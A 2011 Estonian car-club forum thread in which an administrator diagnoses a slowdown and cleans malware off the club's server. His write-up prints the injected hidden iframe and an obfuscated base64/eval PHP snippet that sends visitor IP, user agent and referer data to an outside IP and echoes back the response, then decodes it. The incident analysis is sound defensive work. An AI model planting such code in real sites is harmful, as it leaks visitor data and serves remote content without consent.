Logi sisse

Helari · 31-10-2011, 06:45 PM

(31-10-2011, 02:15 PM)Laur Kirjutas: Foorum on kuidagi meeletult aeglaseks muutunud...

??

+1

***Werewolf*** · 31-10-2011, 08:16 PM

Mulle tundub ka, et täna lehed laevad kole pikalt. Eelnevalt seda probleemi vist polnud või ei pannud seda ennem nii hästi tähele.

***Harry*** · 31-10-2011, 08:20 PM

Probleem on antud seisuga teadmata. Võtsin ühendust zoneiga ning Indrek lubas saata zonei raporti meie viiruste teemadel. Peale neid oskan veidi paremini öelda.

Seniks aga mõned faktid:

Kasutame päevas 1.38 GiB bandwidthi
Saame kuus 53,5k hitti
Postituste arv on ammu üle 100k

Seega ärge väga imestage, kui miski aeglane on ^^

***Harry*** · 31-10-2011, 08:30 PM

Ma vabandan. Vaatasin valet kohta, foorum.clubmb.ee'l on teine statistika ehk 6 655 536 hitti kuus ja 32 444 hitti TUNNIS!

***Laur*** · 31-10-2011, 08:34 PM

Postituste arv ei tähenda midagi.
Loen aegajalt ühte teist foorumit mille postituste arv on: Foorumis on 84263 teemat • 479515 postitust • 16637 kasutajat.

Mercedes-Benz foorum: Meie kasutajad on teinud kokku 100,610 postitust 10,289 teemas.

***Harry*** · 31-10-2011, 08:49 PM

Selles on sul õigus, aga hittide arv on väga väga kõrge. Teoorias peaksime me olema üks Eesti suurimaid portaale siis.

Igatahes, hetkel on selge et keegi ründab.

Isiklikult vaatan kasutajate ip'si. Kus mõned dünaamilised host-aadressid on hittinud meid üle 2000 korra. Ma kahtlen, et üks dyn host-aadress kestab üle hmm.. päeva? Seega see peab tõsine huviline olema.

Momendil ka kaldun arvama, et probleemi allikaks on vene foorum. Need kahtlased hittid pärinevad ka sealt. Hetkel ootan Indreku raportit, zone OFC pole midagi vastanud. Seega eks näis.. Kasutajat sellised asjad ohustatada ei tohiks, lihtsalt käivad pinda.

***Harry*** · 31-10-2011, 10:09 PM

Ok raport käes. Serveris on tehniliselt viirused, kuid kasutajat ei ohusta. Need on pageranki mõjutamiseks mõeldud iframeid, millega on mul kogemusi olnud. Paraku muidugi on failide maht suhteliselt suur, seega puhastus töö saab olema eepiline!

***Harry*** · 01-11-2011, 12:33 PM

Nii, asjad on tegemises. Paraku on failide kogus nii suur, et võtab aega.

Anyways, see on otsenene viiruse leht:

Kood:
http:// 195.2.252.137/ ftp.php

ma panin spaceid vahele, kui keegi proovida tahab..
Ideeliselt ta sulle midagi ei tee, seega julgemad võivad proovida. See leht timeoutib täpselt sama kaua, kuni clubmb.ee lehed laevad..

Puhastamine võtab aega, loodab et zone saab asja automaatselt teha. See seletab ka ära, miks kusagil lehel on mingi alarm hakanud kisama. Ehk clubmb.ee üldise domeenina on kusagil nimekirjas, kui "bad site". See peaks kaduma automaatselt, kui probleem on kõrvaldatud ja kindlasti võtame suurimate lehekülgedega ise ühendust.

***Harry*** · 01-11-2011, 12:37 PM

Nii. Pildipark on korras!

Avastasin uue probleemi, kuid endiselt kinnitan et tava kasutaja jaoks ei ole tähtsust. Sest, need leheküljed on ammu maha võetud, kuigi viirus levib edasi. Mis tähendab, et mingi programm üritab ja üritab seda lehte leida.. seega on leht aeglane ja siis tuleb timeout.

***Harry*** · 01-11-2011, 01:14 PM

B1 Otsing peaks puhas olema ja tundub et suurem osa foorumist on ka puhas.

***Harry*** · 01-11-2011, 01:56 PM

Foorum on 100% puhas ja korras nüüd. Nagu näha siis laeb korralikult.

Vene foorumil tegin põhifailidele kontrolli ja puhastasin nad ära. Tundub et laeb normaalselt.

Detailsema puhastuse teen õhtul, kui istun veidi kiirema neti taga.. Kuid tähtsamad kohad on puhtad, nii et..

***indrek*** · 01-11-2011, 03:09 PM

Toimib kenasti jah, suured tänud

***v6sa*** · 01-11-2011, 03:56 PM

Lippab kenasti küll. Tänud, viiruseloomade tagaajamine võib päris huvitav ülesanne olla...

***Harry*** · 01-11-2011, 04:36 PM

Hetkel küll on veel 300 + 600 (~ arvud) faili vaja puhastada, kuid pole võimalik siit teha. Foorum küll on kindlasti korras, koos tähtsamate juurtega.

Viirustest veidi lähemalt. Viirus jõudis serverisse kellegi arvuti kaudu ehk kellegi FTP programm sai trooja. See käis kõik saidid üle ning bamm bamm lisas iframei html failidesse:

PHP Kood:
<iframe src='http://195.2.252.137/ftp.php' width='1' height='1' style='visibility: hidden;'></iframe> 

ja php failidesse:

PHP Kood:
<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';
eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));
$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];
$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);
$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>

Teeme asja puhtamaks ja decodime:

PHP Kood:
$_F = __FILE__;
$_X = '?><?php $3rl = \'http://96.69e.a6e.o0/bt.php\'; ?>';
$_X = strtr($_X, '123456aouie','aouie123456');
$_R = ereg_replace('__FILE__',"'" . $_F . "'", $_X);
$_R = 0;
$_X = 0;
$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));
$ip = $_SERVER['REMOTE_ADDR'];
$host = $_SERVER['HTTP_HOST'];
$uri = urlencode($_SERVER['REQUEST_URI']);
$ref = urlencode($_SERVER['HTTP_REFERER']);
$url = $url . '?ip=' . $ip . '&host=' . $host . '&uri=' . $uri . '&ua=' . $ua . '&ref='.  $ref;
$tmp = file_get_contents($url);
echo $tmp; 

See eval(base64_decode()); on veits lame, kuid päris kaval. Ehk, mõte on selles, et base64 teeb silmale keeruliseks mingi stringi ning eval() jooksutab selle.. Ehk näiteks ZWNobyAnS2FsbGUgb24gbGFoZSEnOw== --> echo 'Kalle on lahe!'; Ja kuigi peale base64_decode()'i oleks tegemist lihtsalt stringi, siis eval('echo 'Kalle on lahe!';') --> Kalle on lahe!. Ehk pm nad maskisid mingi möga ära. Siis lisasid selle rea alati peale ?> lõppu ning jõhkra spaceiga.. nii et ilma wordwrapita sa ei näeks seda Big Grin

Noh, suht kaval, kuid nad ei arvestanud sellega, et nende emalaev ehk server tõmmatakse rajalt maha.. Mis tähendab, et jah.. tõesti uhke töö.. kuid vägagi mõttetu.

Kogu asja mõte oli selles, et lisada mingi fail lehekülje lõppu. Mis teeks mingi pildi või lehekülje pageranki suuremaks.. Ehk pagerank scam = internet marketing. Realselt ohtu tavakasutajal ei olnud.

Ja kui kedagi huvitab, et kes selle taga on siis: http://en.utrace.de/ip-address/195.2.252.137

***indrek*** · 01-11-2011, 09:57 PM

Vene foorumi kaudu ta ka sisse sai, kui kunagi selle meie serverisse tagasi tõstsime

***Werewolf*** · 01-11-2011, 11:44 PM

Väga tubli töö taas!

Ei mäleta, et lehed olex selles foorumis kunagi nii kiiresti avanenud. Praktiliselt silmapilkselt, ei mingit laadeaega.

***Harry*** · 02-11-2011, 04:19 PM

Kui nett aeglane või mingi cellular device, siis: http://foorum.clubmb.ee/archive/index.php peaks veelgi kiirem olema, kahjus küll ei saa sealt vastata Sad

killer666 · 16-11-2011, 09:48 PM

Kas selle taga olid siis samad vennad tartust,kes nyyd suure k6muga kinni pandi¿
?

***Harry*** · 17-11-2011, 07:02 AM

Ei oska kommenteerida. Kuid tegemist oli internatsionaalse rünnakuga. Ning catch-server oli Moskvas.

***Harry*** · 17-11-2011, 12:41 PM

Ok väikese kommentaari võin teha küll. Pm ei usu, et antud juhul oli tegemist samade inimestega, kuid meetod on täpselt sama. Eestlaste roll oli lihtsalt näha võimalust ja kasutasid seda. Muidugi, muljetavaldav oli näha "marketing" lehekülge sellist jama ajamas.. See jutt, et kodulehele pole võimalik väljast ligi pääseda ning need kodulehed teadlikult seda koodi seal hoidsid, on muidugi vale. Antud skeem käis läbi puhta häkkimise ning viiruste kaudu.

Tegelen isegi SEO parandamisega, kuid selline meetod on vägagi ebaeetiline.

Logi sisse
Kasutajanimi:
Parool:	Kaotasid parooli?
	Mäleta mind

Võimalikud seotud teemad...
Teema:		Autor	Vastuseid:	Vaatamisi:	Viimane postitus
	Probleemid seoses foorumiga	indrek	64	75,694	06-09-2011, 12:00 AM Viimane postitus: Harry